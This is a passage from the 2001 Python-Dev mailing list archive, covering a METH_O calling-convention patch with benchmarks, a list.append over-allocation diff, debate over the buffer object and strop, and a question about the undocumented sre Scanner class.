20000 indices1 = indices*100 r1 = [1]*60 def doit(case): s = clock() i = 0 if case == 0: f = ord for i in indices1: f("o") elif case == 1: for i in indices: l = [] f = l.append for i in r1: f(i) elif case == 2: f = len for i in indices1: f("o") f = clock() return f - s for i in xrange(10): print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2)) Without the patch, (almost) stock CVS gives 2.190 1.800 2.240 2.200 1.800 2.220 2.200 1.800 2.230 2.220 1.800 2.220 2.200 1.800 2.220 2.200 1.790 2.240 2.200 1.790 2.230 2.200 1.800 2.220 2.200 1.800 2.240 2.200 1.790 2.230 With the patch, I get 1.440 1.330 1.460 1.420 1.350 1.440 1.430 1.340 1.430 1.510 1.350 1.460 1.440 1.360 1.470 1.460 1.330 1.450 1.430 1.330 1.420 1.440 1.340 1.440 1.430 1.340 1.430 1.410 1.340 1.450 So the speed-up is roughly 30% to 50%, depending on how much work the function has to do. Please let me know what you think. Regards, Martin From mal at lemburg.com Fri May 25 10:23:10 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:23:10 +0200 Subject: [Python-Dev] strop vs. string References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> Message-ID: <3B0E166E.581816AA@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > Aren't buffer objects as they're currently implemented > inherently dangerous? Why should they be ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 10:56:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:56:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <3B0E1E2C.4BC121B5@lemburg.com> "Martin v. Loewis" wrote: > > > Special-casing the snot out of "O" looks like a winner : > > I have a patch on SF that takes this approach: > > http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 > > The idea is that functions can be declared as METH_O, instead of > METH_VARARGS. I also offer METH_l, but this is currently not used. The > approach could be extended to other signatures, e.g. METH_O_opt_O > (i.e. "O|O"). Some signatures cannot be changed into special-calls, > e.g. "O!", or "ll|l". > > [benchmark] > So the speed-up is roughly 30% to 50%, depending on how much work the > function has to do. > > Please let me know what you think. Great idea, Martin. One suggestion though: I would change is the way the function is "declared" in the method list. Your currently use: {"append", (PyCFunction)listappend, METH_O, append_doc}, Now this would be more flexible if you would implement a scheme which lets us put the parser string into the method list. The call mechanism could then easily figure out how to call the method and it would also be more easily extensible: {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, This would then (just like in your patch) call the listappend function with the parser arguments inlined into the C call: listappend(self, arg0) A parser marker "OO" would then call a method like this: method(self, arg0, arg1) and so on. This approach costs a little more (the string compare), but should provide a more direct way of converting existing functions to the new convention (just copy&paste the PyArg_ParseTuple() argument) and also allows implementing a generic scheme which then again relies on PyArg_ParseTuple() to do the argument parsing, e.g. "is#" could be implemented as: PyObject *method(PyObject self, int arg0, char *arg1, int *arg1_len) For optional arguments we'd need some convention which then lets the called function add the default value as needed. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From ping at lfw.org Fri May 25 12:56:33 2001 From: ping at lfw.org (Ka-Ping Yee) Date: Fri, 25 May 2001 05:56:33 -0500 (CDT) Subject: [Python-Dev] May 25 is Towel Day (towelday.org) Message-ID: If you have enjoyed Douglas Adams' works, please consider carrying or wearing a towel with you everywhere today, May 25, as a tribute and in his memory. For more about Towel Day, visit http://www.towelday.org/. My apologies for being off-topic. -- ?!ng From gstein at lyra.org Fri May 25 13:59:23 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 04:59:23 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200 References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com> Message-ID: <20010525045923.C12056@lyra.org> On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote: > Greg Ewing wrote: > > "M.-A. Lemburg" : > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > Aren't buffer objects as they're currently implemented > > inherently dangerous? > > Why should they be ? The buffer object caches the pointer from getreadbuffer and friends. If the target object changes that pointer (internally), then the buffer object's value is stale. But that is a bug fix; it is independent of the discussion at hand. Cheers, -g -- Greg Stein, http://www.lyra.org/ From Barrett at stsci.edu Fri May 25 15:21:20 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Fri, 25 May 2001 09:21:20 -0400 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <3B0E5C50.6E365F69@STScI.Edu> "M.-A. Lemburg" wrote: > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. Sounds like you are trying to make the buffer object into something it is not. Not that I have the foggiest idea what it is now, since it hasn't much use and is badly broken. I like your idea of sharing functions, I just don't think the buffer object is the proper means. I think the buffer object should be removed from Python and something better put in its place. (I'm not talking about the buffer C/API, though this could also use an overhaul, since it doesn't provide enough information to the receiving method.) What I think we need is: 1) a malloc object which has a similar interface to the mmap object with access protection, etc. This object would be the fundamental way of getting memory. The string object would use it to allocate a chunk of 'read-only' memory. Other objects would then know not to modify the contents of the memory. If you wanted a reference or view of the memory/buffer, you would get a reference to this object. 2) objects supporting the buffer object should provide a view method which returns a copy of themselves (and hence all their methods) and can be used to get a pointer to a subset of its memory. In this way the type of memory/buffer being accessed is known compared to the current buffer object which only indicates the buffer is binary or char data. In essence information about how the buffer should be used is lost in the current buffer C/API. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From guido at digicool.com Fri May 25 16:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 25 May 2001 10:29:28 -0400 Subject: [Python-Dev] Vacation Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com> I will be on vacation next week without net access. Back on June 4th! There's a bunch of stuff that happened on the mailing list that I expect I won't get to -- I've got to finish up some high priority work for Digital Creations before I can leave. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 25 21:06:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 15:06:16 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: c.l.py has rediscovered the quadratic-time worst-case behavior of list.append(). That is, do list.append(x) in a long loop. Linux users don't see anything particularly bad no matter how big the loop. WinNT eventually displays clear quadratic-time behavior. Win9x dies surprisingly early with a MemoryError, despite gobs of memory free: turns out Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the whole 2GB user space gets fragmented beyond hope). People on other platforms have reported other bad behaviors over the years. I don't want to argue about this again , I just want to know whether the patch below slows anything down on your oddball box. It increases the over-allocation amount in several more layers. Also replaces integer * and / in the over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes). Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. Index: Objects/listobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v retrieving revision 2.92 diff -c -r2.92 listobject.c *** Objects/listobject.c 2001/02/12 22:06:02 2.92 --- Objects/listobject.c 2001/05/25 19:04:07 *************** *** 9,24 **** #include /* For size_t */ #endif ! #define ROUNDUP(n, PyTryBlock) \ ! ((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock)) static int roundupsize(int n) { ! if (n < 500) return ROUNDUP(n, 10); else ! return ROUNDUP(n, 100); } #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems)) --- 9,30 ---- #include /* For size_t */ #endif ! #define ROUNDUP(n, nbits) \ ! ( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) ) static int roundupsize(int n) { ! if ((n >> 9) == 0) ! return ROUNDUP(n, 3); ! else if ((n >> 13) == 0) ! return ROUNDUP(n, 7); ! else if ((n >> 17) == 0) return ROUNDUP(n, 10); + else if ((n >> 20) == 0) + return ROUNDUP(n, 13); else ! return ROUNDUP(n, 18); } #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems)) From martin at loewis.home.cs.tu-berlin.de Fri May 25 21:51:26 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 21:51:26 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> > Now this would be more flexible if you would implement a scheme > which lets us put the parser string into the method list. The > call mechanism could then easily figure out how to call the > method and it would also be more easily extensible: > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, I'd like to hear other people's comment on this specific issue, so I guess I should probably write a PEP outlining the options. My immediate reaction to your proposal is that it only complicates the interface without any savings. We still can only support a limited number of calling conventions. E.g. it is not possible to write portable C code that does all the calling conventions for "l", "ll", "lll", "llll", and so on - you have to cast the function pointer to the right prototype, which must be done in source code. So with this interface, you may end up at run-time finding out that you cannot support the signature. With the current patch, you'd have to know to convert "OO" into METH_OO, which I think is not asked too much - and it gives you a compile-time error if you use an unsupported calling convention. > A parser marker "OO" would then call a method like this: > > method(self, arg0, arg1) > > and so on. That is indeed the plan, but since you have to code the parameter combinations in C code, you can only support so many of them. > allows implementing a generic scheme which > then again relies on PyArg_ParseTuple() to do the argument > parsing, e.g. "is#" could be implemented as: The point of the patch is to get rid of PyArg_ParseTuple in the "common case". For functions with complex calling conventions, getting rid of the PyArg_ParseTuple string parsing is not that important, since they are expensive, anyway (not that "is#" couldn't be supported, I'd call it METH_is_hash). > For optional arguments we'd need some convention which then > lets the called function add the default value as needed. For the moment, I'd only support "|O", and perhaps "|z"; an omitted argument would be represented as a NULL pointer. That means that "|i" couldn't participate in the fast calling convention - unless we translate that to void foo(PyObject*self, int i, bool ipresent); BTW, the most frequent function in my measurements that would make use of this convention is "OO|i:replace", which scores at 4.5%. Regards, Martin From gstein at lyra.org Fri May 25 22:27:52 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 13:27:52 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> Message-ID: <20010525132752.B5402@lyra.org> On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote: > "M.-A. Lemburg" wrote: > > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > > Then you could write: buffer(ob).find('.'). > > > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > > > That's the point: you can wrap all those into a buffer object > > and then use the buffer object methods to manipulate them. In > > that sense, buffer objects provide an adaptor to the underlying > > object which implements the needed methods. > > Sounds like you are trying to make the buffer object into something it > is not. The buffer object is intended to provide a Python-level object (with methods and behavior) for any other object which exports the buffer API (but not those particular methods/behavior). It was added for Python 1.5.2, but did not keep up with the methods added to the string object. Arguably, it is out of date rather than "[turning it into] something it is not." > Not that I have the foggiest idea what it is now, since it > hasn't much use and is badly broken. "badly" is overstating the problem. It caches a pointer when it shouldn't. This doesn't work well when using it with array objects or PIL's image objects. Most objects, it is fine. The buffer object is also very good for C/Python extensions and embedding code. It provides a Python-level view on a block of memory. Using a string object implies making a copy, and it removes the possibility for read/write access to that memory. And you state: "Not that I have the foggiest idea what it is now". If so, then wtf are you making statements about the buffer object's behavior? > I like your idea of sharing functions, I just don't think the buffer > object is the proper means. I think the buffer object should be > removed from Python and something better put in its place. (I'm not > talking about the buffer C/API, though this could also use an > overhaul, since it doesn't provide enough information to the receiving > method.) > > What I think we need is: > > 1) a malloc object which has a similar interface to the mmap object > with access protection, etc. This object would be the fundamental way > of getting memory. The string object would use it to allocate a chunk > of 'read-only' memory. Other objects would then know not to modify > the contents of the memory. If you wanted a reference or view of the > memory/buffer, you would get a reference to this object. You're talking about the buffer object that we have *today*. It can refer to another object (i.e. the memory exposed via the other object's buffer API), refer to memory, or it can allocate its own memory. The buffer object can be marked read-only, or read-write. > 2) objects supporting the buffer object should provide a view method > which returns a copy of themselves (and hence all their methods) and > can be used to get a pointer to a subset of its memory. In this way > the type of memory/buffer being accessed is known compared to the > current buffer object which only indicates the buffer is binary or > char data. In essence information about how the buffer should be used > is lost in the current buffer C/API. I'm not sure that I understand this paragraph. No... what needs to happen is to have the bug in PyBufferObject fixed. Then to refactor stringobject.c and stropmodule.c to move all of those byte-oriented processing functions into a new file such as Python/byteops.c (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c would be simple covers over the same functions. Those functions can then be used by PyBufferObject to implement the rest of the string methods on itself. This would leave us at MAL's suggested point: via the buffer object, we can perform all of the standard string methods/ops on any object that implements the buffer API. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Fri May 25 23:16:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:16:32 +0200 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0ECBB0.6798F4AB@lemburg.com> Tim Peters wrote: > > Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. That's what I think too. There's really not much point in trying to work around poor malloc() implementations when we've already got the cure built into Python... I just wish Vladimir would resurface again to complete his great work (AFAIK, pymalloc still has problems with threads). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 23:38:15 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:38:15 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> Message-ID: <3B0ED0C7.F1A665EA@lemburg.com> "Martin v. Loewis" wrote: > > > Now this would be more flexible if you would implement a scheme > > which lets us put the parser string into the method list. The > > call mechanism could then easily figure out how to call the > > method and it would also be more easily extensible: > > > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, > > I'd like to hear other people's comment on this specific issue, so I > guess I should probably write a PEP outlining the options. > > My immediate reaction to your proposal is that it only complicates the > interface without any savings. We still can only support a limited > number of calling conventions. E.g. it is not possible to write > portable C code that does all the calling conventions for "l", "ll", > "lll", "llll", and so on - you have to cast the function pointer to > the right prototype, which must be done in source code. > > So with this interface, you may end up at run-time finding out that > you cannot support the signature. With the current patch, you'd have > to know to convert "OO" into METH_OO, which I think is not asked too > much - and it gives you a compile-time error if you use an unsupported > calling convention. True. It's unfortunate that C doesn't offer the reverse of varargs.h... > > A parser marker "OO" would then call a method like this: > > > > method(self, arg0, arg1) > > > > and so on. > > That is indeed the plan, but since you have to code the parameter > combinations in C code, you can only support so many of them. > > > allows implementing a generic scheme which > > then again relies on PyArg_ParseTuple() to do the argument > > parsing, e.g. "is#" could be implemented as: > > The point of the patch is to get rid of PyArg_ParseTuple in the > "common case". For functions with complex calling conventions, getting > rid of the PyArg_ParseTuple string parsing is not that important, > since they are expensive, anyway (not that "is#" couldn't be > supported, I'd call it METH_is_hash). > > > For optional arguments we'd need some convention which then > > lets the called function add the default value as needed. > > For the moment, I'd only support "|O", and perhaps "|z"; an omitted > argument would be represented as a NULL pointer. That means that "|i" > couldn't participate in the fast calling convention - unless we > translate that to > > void foo(PyObject*self, int i, bool ipresent); > > BTW, the most frequent function in my measurements that would make use > of this convention is "OO|i:replace", which scores at 4.5%. I was thinking of using pointer indirection for this: foo(PyObject *self, int *i) If i is given as argument, *i is set to the value, otherwise i is set to NULL. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 00:11:43 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 18:11:43 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com> Message-ID: [Tim] > Long-term we should teach PyMalloc about Python's realloc() > abuses and craft a cooperative solution. [MAL] > That's what I think too. There's really not much point in trying > to work around poor malloc() implementations when we've already > got the cure built into Python... The point *here* is that a simple localized patch could kill off a Frequently Irritating Complaint without further ado: on my personal cost/benefit scale, it's all I can *afford* to do now. PyMalloc likely won't solve it as-is x-platform, without new work to accommodate extreme realloc() abuse. > I just wish Vladimir would resurface again to complete his great > work I'd like him to come back even if he doesn't . > (AFAIK, pymalloc still has problems with threads). It has lock macros that haven't been #define'd to do anything yet. But part of the potential value of the Python core using its own allocator is to exploit the global interpreter lock to *not* lock in the allocator. Messy issues. Python should grow a cheaper platform-specific flavor of internal lock too. (Jeremy pointed out some code the other day that jumps through hoops to simulate a reentrant lock on top of a Python lock; an irony is that on Windows, the native lock *is* reentrant already, and Python jumps through hoops to make it act as if it weren't ) From mal at lemburg.com Sat May 26 00:07:00 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 00:07:00 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org> Message-ID: <3B0ED784.FC53D01@lemburg.com> Greg Stein wrote: > > No... what needs to happen is to have the bug in PyBufferObject fixed. Then > to refactor stringobject.c and stropmodule.c to move all of those > byte-oriented processing functions into a new file such as Python/byteops.c > (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c > would be simple covers over the same functions. > > Those functions can then be used by PyBufferObject to implement the rest of > the string methods on itself. > > This would leave us at MAL's suggested point: via the buffer object, we can > perform all of the standard string methods/ops on any object that implements > the buffer API. I wonder how we could achieve this without copy&pasting all the needed methods from stringobject.c to bufferobject.c.... all the string methods use the string object layout directly rather than just dealing with a pointer and a length. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From m.favas at per.dem.csiro.au Sat May 26 04:34:20 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 10:34:20 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au> [Tim wants to know whether his patch to listobject.c slows anything down on anyone's "oddball box"...] While in no way admitting that mine is an oddball box , it being a Tru64 Unix alpha processor machine, I do see a slowdown after applying the patch (measured on the test suite and on pystone). However, it's only of the order of 0.5 to 1%. slightly-oddly y'rs - Mark -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From tim.one at home.com Sat May 26 06:05:40 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 00:05:40 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au> Message-ID: [Mark Favas] > [Tim wants to know whether his patch to listobject.c slows anything down > on anyone's "oddball box"...] > > While in no way admitting that mine is an oddball box , Heh -- of course not. I had more in mind obscure OSes like Linux . > it being a Tru64 Unix alpha processor machine, I do see a slowdown > after applying the patch (measured on the test suite and on pystone). > However, it's only of the order of 0.5 to 1%. Now that's very odd, since Alpha has about the slowest integer divsion on Earth, and every list append was doing an int div before the patch but not after. I'm afraid that timing the test suite before and after is a red herring, as several of the expensive tests have (pseudo)random components and can do an amount of work that varies depending on system time at the time random.py is first imported. pystone is even odder: the relevant code in listobject.c is never executed during pystone! I suspected that because pystone is an old synthetic Ada benchmark simulating a pile of integer systems programs, so pystone is unique among Python programs in not exercising any of Python's useful features -- a breakpoint in the debugger just now confirmed it (never did a list resize after compilation finished). So I'm pretty sure that after I check it in, you'll see a speedup instead . Get anywhere identifying why your other app is 20% slower (blast from the past)? From martin at loewis.home.cs.tu-berlin.de Sat May 26 07:28:32 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 26 May 2001 07:28:32 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> > I was thinking of using pointer indirection for this: > > foo(PyObject *self, int *i) > > If i is given as argument, *i is set to the value, otherwise > i is set to NULL. That is a good idea; I'll try to update my patch to more calling conventions. Regards, Martin From tim.one at home.com Sat May 26 08:44:04 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 02:44:04 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0ED784.FC53D01@lemburg.com> Message-ID: The buffer object has been neglected for years: is that because it's in prime shape, or because nobody cares about it enough to maintain it? "The bug" has been known for years without any action taken to address it; the docs give up in spots and nobody addresses that either (like "The current policy seems to state that these characters may be multi-byte characters" -- well, yes or no?); the builtin buffer() function isn't called anywhere in the std test suite; the file object still has an undocumented readinto() method that just confuses people who bump into it; and it's so obscure in daily life that it appears Guido didn't even think of it when adding iterators for the other sequence types. I expect that answers my question . Is someone (Greg? MAL?) going to champion it now? That would be cool. About combining strop and buffers and strings, don't forget unicodeobject.c: that's got oodles of basically duplicate code too. /F suggested dealing with the minor differences via maintaining one code file that gets compiled multiple times w/ appropriate #defines. From tim.one at home.com Sat May 26 10:14:06 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 04:14:06 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: I don't want to see us duplicate the guts of PyArg_ParseTuple() inside do_call_special(). METH_O is a cool idea, METH_l is marginal, and the new code is already slower for METH_O than it needs to be in order to support the *possibility* of METH_l too (stacks and loops and switch stmts and an extra layer of do_call_special function call "just in case"). Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend . 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim From m.favas at per.dem.csiro.au Sat May 26 10:30:29 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 16:30:29 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au> [Tim tells Mark that his observations reflect more Brownian motion (pseudo!) than reality...] > [Mark Favas] > > it being a Tru64 Unix alpha processor machine, I do see a slowdown > > after applying the patch (measured on the test suite and on pystone). > > However, it's only of the order of 0.5 to 1%. > > Now that's very odd, since Alpha has about the slowest integer divsion on > Earth, and every list append was doing an int div before the patch but not > after. > > I'm afraid that timing the test suite before and after is a red herring, as > several of the expensive tests have (pseudo)random components and can do an > amount of work that varies depending on system time at the time random.py is > first imported. > > pystone is even odder: the relevant code in listobject.c is never executed > during pystone! I suspected that because pystone is an old synthetic Ada > benchmark simulating a pile of integer systems programs, so pystone is > unique among Python programs in not exercising any of Python's useful > features -- a breakpoint in the debugger just now confirmed it (never > did a list resize after compilation finished). > > So I'm pretty sure that after I check it in, you'll see a speedup instead > . OK : this time, instead of making unwarranted assumptions about test suites and pystones , I wrote and ran a test that I _think_ should exercise the code (at least, it does lots of list.append()s), and, yes, the newly checked-in code's about 3-4% faster compared with the original version of, well, days ago. > > Get anywhere identifying why your other app is 20% slower (blast from the > past)? No, not yet. The profiling results at first eyeball seemed hard to match up, so I put it off for a rainy weekend. And Perth's drought has just broken... Will attempt to make sense of it. Interesting that Marc Andre seemed to get a somewhat similar slowdown between 1.52 and 2.0. -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From mal at lemburg.com Sat May 26 11:54:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 11:54:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> Message-ID: <3B0F7D44.1A12CE0F@lemburg.com> "Martin v. Loewis" wrote: > > > I was thinking of using pointer indirection for this: > > > > foo(PyObject *self, int *i) > > > > If i is given as argument, *i is set to the value, otherwise > > i is set to NULL. > > That is a good idea; I'll try to update my patch to more calling > conventions. This morning another idea popped up which could help us with handling generic callings schemes: How about making *all* parameters pointers ?! The calling mechanism would then just have to deal with an changing number of parameters and not with different types (this is how PyArg_ParseTuple() works too if I remember correctly). We could easily provide calling schemes for 1 - n arguments that way and the types of these arguments would be defined by the parser string just like before. Examples: foo(PyObject *self, PyObject *obj, int *i) bar(PyObject *self, int *i, int *j, char *txt, int *len) To call these, the calling mechanism would have to cast these to: foo(void *, void *, void *) bar(void *, void *, void *, void *, void *) Wouldn't this work ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paulp at ActiveState.com Sat May 26 17:02:08 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Sat, 26 May 2001 08:02:08 -0700 Subject: [Python-Dev] Scanner Message-ID: <3B0FC570.17707787@ActiveState.com> What ever happened to the sre Scanner? It seemed like a good idea but it was not documented and it doesn't work for me. Is it just a case of nobody got around to the documentation or have we decided against it? Here's the code that doesn't work for me: from sre import Scanner scanner = Scanner([ (r"[a-zA-Z_]\w*", None), (r"\d+\.\d*", None), (r"\d+", None), (r"=|\+|-|\*|/", None), (r"\s+", None), ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") Traceback (most recent call last): File "junk.py", line 11, in ? tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") File "c:\program files\python21\lib\sre.py", line 254, in scan action = self.lexicon[m.lastindex][1] TypeError: sequence index must be integer m.lastindex is None -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mal at lemburg.com Sat May 26 17:47:47 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 17:47:47 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B0FD023.C4588919@lemburg.com> Tim Peters wrote: > > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? "The > bug" has been known for years without any action taken to address it; the > docs give up in spots and nobody addresses that either (like "The current > policy seems to state that these characters may be multi-byte characters" -- > well, yes or no?); the builtin buffer() function isn't called anywhere in > the std test suite; the file object still has an undocumented readinto() > method that just confuses people who bump into it; and it's so obscure in > daily life that it appears Guido didn't even think of it when adding > iterators for the other sequence types. > > I expect that answers my question . Is someone (Greg? MAL?) going to > champion it now? That would be cool. I believe that nobody really likes the buffer interface enough to let the world know about it, except maybe Greg ;-) Even the idea of replacing the usage of strings as data buffers with buffer object didn't get very far; common habits are simply hard to break. > About combining strop and buffers and strings, don't forget unicodeobject.c: > that's got oodles of basically duplicate code too. /F suggested dealing > with the minor differences via maintaining one code file that gets compiled > multiple times w/ appropriate #defines. Hmm, that only saves us a few kB in source, but certainly not in the object files. The better idea would be making the types subclass from a generic abstract string object -- I just don't know how this will be possible with Guido's type patches. We'll just have to wait, I guess. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 23:15:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 17:15:11 -0400 Subject: [Python-Dev] Scanner In-Reply-To: <3B0FC570.17707787@ActiveState.com> Message-ID: [Paul Prescod] > What ever happened to the sre Scanner? It seemed like a good idea > but it was not documented I previously urged /F to document, and Python-Dev to accept, the .lastindex and .lastgroup match object extensions, but to date got no response. Whether to adopt the Scanner class too is fuzzier, since AFAICT almost nobody has figured out how to use it. > and it doesn't work for me. This isn't a code problem, it's a failure to reverse-engineer the undocumeted API . > Is it just a case of nobody got around to the documentation or have > we decided against it? WRT Scanner, partly the former, nothing of the latter, 